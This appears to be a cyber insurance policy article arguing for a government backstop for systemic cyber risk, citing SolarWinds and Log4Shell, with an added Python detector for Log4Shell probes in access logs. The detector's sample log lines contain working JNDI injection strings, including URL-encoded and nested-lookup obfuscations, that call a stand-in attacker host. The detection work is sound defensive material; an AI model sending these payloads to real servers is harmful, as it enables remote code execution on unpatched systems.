Cyber Insurance and the National Cybersecurity Strategy
The cyber insurance industry can help stabilize global cyber risk.
Here’s how.
So far, it has been more subtle than a massive attack on the US power grid, but threats to critical infrastructure are growing as geopolitics become more complex.
Security firm Dragos reported that Pipedream, an industrial control system attack toolkit that has been linked to Russia, was recently used in attempts to disrupt "around a dozen" U.S. electric and liquefied natural gas sites. Ransomware attacks on the health sector have been linked to a reported 20% increase in mortality at hospitals hit by an attack. And multiple public institutions, including LA Unified School District and the City of Oakland, California, have recently had thousands of citizens', students', and employees' private records dumped onto the dark web, where criminals can use them for fraud and future phishing attacks.
Against the backdrop of these attacks, the 2023 U.S. National Cybersecurity Strategy, announced last week, acknowledged that the threat of cyber disruption to critical infrastructure is high enough that U.S. federal regulators will begin using existing health and safety authorities to audit the cybersecurity of critical infrastructure such as water systems and pipelines.
The primary challenge with cyber attacks is the unknown nature of the risk. No one is sure what the “big one” in cyber will look like, when it will come, or what it will cost.
Resilience believes cyber insurance provides a powerful stabilizing force that overlays the existing cybersecurity domain. Insurance encourages policyholders to adopt strong cybersecurity standards, controls, and best practices, and it gives them access to mitigation and response resources if an incident occurs.
As a former Congressional staffer, I have seen no shortage of legislative overreach in times of crisis. The cyber insurance market cannot afford knee-jerk reactions from policymakers when thousands of US networks are locked up by a new wormable ransomware strain, or when major metropolitan regions are scrambling to restore heat in winter because of a common vulnerability in the industrial control systems of electric substations.
This is why Resilience joined leading security companies, as a member of the Cybersecurity Coalition, in writing in support of the US Treasury's work to explore establishing a cyber insurance backstop to help absorb systemic-level cyber risks that are too large for the private market alone.
The cyber insurance market has seen the problem coming for some time. In 2019, I joined colleagues from companies such as Microsoft and Marsh to identify some of the sources of systemic risk that could lead to failures of the cyber insurance market. The report recommended:
“Increasing overall capacity in the cyber insurance market to handle a major, multi-market loss through the creation of a government backstop for systemic cyber incidents, similar to those created for terrorist events (TRIA in the U.S. and Pool Re in the UK). A private reinsurance pool is imagined as the most appropriate model for cyber insurance, which could include the following: certification of an incident by a government official as eligible for coverage under the program, a requirement that all primary insurers offer cyber coverage to commercial clients, multi-line coverage, and incentives for consumers and service providers to invest in cybersecurity.”
Since then, the insurance market has seen several “near miss” events that could have easily triggered catastrophic losses across the insurance market.
The SolarWinds supply chain attack of 2020 compromised several US government agencies, including the Department of Defense, and private companies, including Microsoft and FireEye. It was a potential systemic event because the attackers did not exploit a flaw in deployed systems; they inserted a backdoor into signed, legitimate updates of the widely used SolarWinds Orion software, so every organization that installed the update gave a highly advanced adversary a foothold. Patching, the usual defense, would have been the infection vector.
However, while the attack was highly sophisticated, the attackers focused on espionage and data theft rather than on manipulating or destroying systems, and they pursued a relatively narrow set of follow-on targets, primarily US government entities. Both factors significantly lowered the attack's impact on the cyber insurance market.
The Log4Shell vulnerability of 2021 (CVE-2021-44228) was a second near miss for the cyber insurance market. This critical vulnerability in the popular open-source logging library Apache Log4j allows attackers to execute arbitrary code remotely. It is considered highly severe because a threat actor only needs to get a vulnerable application to log a single specially crafted string, such as a ${jndi:ldap://...} lookup placed in an HTTP header, and because Log4j is embedded in an enormous range of systems and applications, many of whose operators did not know they were running it.
While this vulnerability represents a disaster scenario if fully leveraged by criminals, the security community reacted quickly and cooperatively to develop and distribute patches as widely as possible once it was disclosed. Criminal groups have been observed exploiting it, and continue to, but the publicity surrounding it drove most organizations to patch before mass exploitation for destructive ends could take hold.
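The single-string trigger described above is also what makes Log4Shell awkward to detect: attackers rarely send the literal text ${jndi:, and instead hide the keyword inside nested Log4j lookups (${lower:j}, ${::-j}, ${env:NOPE:-j}) or URL-encode the whole payload. The following Python script is an added example, not code from the original article, from Resilience, or from the Apache project. It normalises constructed web-server access-log lines by URL-decoding them and collapsing nested lookups innermost-first, then matches the resulting jndi:scheme: prefix. The log lines, IP addresses and the set of obfuscation patterns it handles are assumptions for illustration, not an exhaustive list.

```python
"""
Added example (not from the original article): a small detector for Log4Shell
(CVE-2021-44228) probes in web-server access-log lines.

A naive substring match on "${jndi:" misses real attacks because the keyword is
usually obfuscated with nested Log4j lookups or URL encoding.  normalise() folds
the common obfuscations before matching.  All sample data here is constructed.
"""
import re
import urllib.parse
from typing import Dict, List

# One innermost lookup, i.e. ${...} whose body contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")

# jndi:<scheme>: after normalisation; schemes seen in public exploit attempts.
_JNDI = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def _resolve_one(body: str) -> str:
    """Collapse one innermost lookup into the text Log4j would evaluate it to.

    Patterns handled (assumption: the common ones, not every Log4j lookup):
      ${::-j}          -> "j"   empty lookup with a default value
      ${env:NOPE:-j}   -> "j"   unset variable, default value used
      ${lower:J}       -> "j"
      ${upper:j}       -> "J"
      ${date:'j'}      -> "j"   date pattern carrying a quoted literal
    Anything else has its ${ } stripped and the body kept as literal text.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if low.startswith("date:"):
        return body[5:].strip("'")
    return body


def normalise(text: str, max_rounds: int = 20) -> str:
    """URL-decode (twice, for double encoding) and collapse nested lookups."""
    text = urllib.parse.unquote(urllib.parse.unquote(text))
    for _ in range(max_rounds):  # bounded so hostile input cannot loop forever
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, once de-obfuscated, carries a JNDI lookup."""
    return _JNDI.search(normalise(line)) is not None


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per flagged line: line number, JNDI scheme, normalised text."""
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        norm = normalise(line)
        m = _JNDI.search(norm)
        if m:
            hits.append({"line": n, "scheme": m.group(1).lower(), "normalised": norm})
    return hits


# Constructed sample access log (fabricated addresses from documentation ranges).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:18:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:18:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:18:02:13 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:18:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${env:NOPE:-d}${::-i}:${lower:rmi}://198.51.100.7/c}"',
    '10.0.0.3 - - [10/Dec/2021:18:02:15 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']}")
```

Lines 2, 3 and 4 of the sample are flagged (plain, URL-encoded, and nested-lookup variants); line 5 uses a harmless ${date:...} lookup and is not. The bounded loop in normalise() matters: an attacker who knows the detector will try deeply nested or self-referencing lookups to exhaust it, so the cap keeps scanning cost linear in the input.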
Given the growing threat to critical infrastructure and the number of near misses we are seeing, the government has an opportunity to begin a conversation with the insurance industry on how to work together to tackle these looming issues.
In advance of this discussion, however, there is more the insurance industry can do today to reduce the impact of these types of risk on clients and capacity providers.
Concrete steps of this kind, taken across the market, help mitigate capital exposure to unforeseen systemic events and, more importantly, the potential for harm to our clients and to global critical infrastructure.
The attacker will always have the edge in imagination, but declining to have the conversation guarantees disaster. With the Administration opening the door for discussion, the industry should come to the table.
Learn more about Resilience at www.cyberresilience.com.
Enjoyed this article? Share it with your network, and follow Resilience for more #CyberInsurance and #CyberResilience content.
About the Author
Davis Hake is the Co-Founder and Vice President of Communications and Policy at Resilience Insurance. Prior to starting at Resilience in 2016, Hake managed cybersecurity strategy for Palo Alto Networks, served on the National Security Council at The White House, and was a lead author of cybersecurity legislation in the U.S. Congress. Hake is also currently an Adjunct Professor of Cyber Risk Management at the University of California, Berkeley and a Term Member of the Council on Foreign Relations.
Student at ISBR Business School
6 months ago: This article talks about how, in today's interconnected digital landscape, the question of whether your small business needs cyber insurance isn't just a consideration; it's a necessity. With cyber threats on the rise, from data breaches to ransomware attacks, safeguarding your assets and reputation is paramount. Companies like Mitigata can play a pivotal role in this aspect by offering tailored cybersecurity solutions that preemptively address potential risks before they materialize into claims. https://mitigata.com/